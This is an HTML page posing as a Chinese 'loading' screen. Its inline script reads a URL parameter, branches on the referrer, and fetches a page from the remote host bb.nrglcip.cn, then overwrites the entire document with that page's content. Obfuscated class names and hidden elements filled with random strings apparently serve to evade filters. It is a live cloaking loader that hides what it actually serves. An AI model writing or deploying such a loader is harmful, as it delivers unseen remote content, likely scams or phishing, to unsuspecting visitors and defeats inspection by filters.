<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .OLQRoDJsHhY {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .OLQRoDJsHhY .oVWavlKJ {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .OLQRoDJsHhY .content {
            line-height: 50px;
            text-align: center
        }

        .OLQRoDJsHhY .img {
            width: 100%
        }

        .OLQRoDJsHhY .bR4Oz7TFO {
            text-align: center
        }

        .OLQRoDJsHhY .bR4Oz7TFO span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .OLQRoDJsHhY .bR4Oz7TFO span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .OLQRoDJsHhY .bR4Oz7TFO span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .OLQRoDJsHhY .bR4Oz7TFO span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .OLQRoDJsHhY .bR4Oz7TFO span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .OLQRoDJsHhY .bR4Oz7TFO span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .OLQRoDJsHhY .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function HEJreHSXfbLeJ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var kPfrW = HEJreHSXfbLeJ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ kPfrW +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ kPfrW +".html?a=share";
		}
		
        vfNxfCRZ=url+"#"+new Date().getTime();
        vfNxfCRZ && function() {
            $.get(vfNxfCRZ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >Le9e5uUyFrlushnquDuH7kPu7ovx8i3F2qDhHIF00bYNcOPeBNjfosN8y4HsELcX5oYXWf</b>
<h1 style='display:none' >EBtTq6u8k1GfXkod8j0diNOZBmpKSgJ9sRF8utoYdYLAlb6dAw3T</h1>
<li style='display:none' >AlWSD5bgczPBQahRu1WY2OJsUcBLlQQ1ctzY9rk55AvamQlI</li>
<a  href='#' style='display:none'>hWrZ1i7h1BmZnvjJ97Q8jonP4XzpgD3ZfQtbHfWGDZpof6Fq8lA3Ae</a><div class="OLQRoDJsHhY">
    <div class="oVWavlKJ">
        <div class="bR4Oz7TFO">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >zq3Chdefwsa6y5P05RPLMAnftl4p1e4xezsjuzj0fcWDum2N0qVQkwXupF1adts5Y8fKlgibd2Yu97TMV7bueq</b>
<p  style='display:none'>jOsQucDeV2dTU8H7COG78kHWDozwuYn7VxqHTpE1ebOmdQoVDkPcKgydP24vumDtashAg70EGsC8fbNy72tq3L</p>
<a  href='#' style='display:none'>X1Bi6tngWcz4YuVtrxVG5YB5lWISYzc0HOjRQGWKLpHtsrVA0meyOwzfrPqHCdrvqLeW7eyV9JbZHMYFRxuta2wa91Qm7NM6jXm9K</a>
<li style='display:none' >i7mqGyOZ49qVgljDdXqDzexegVp0nnxhFMIZtFQadInBL9Bh</li></body>
</html>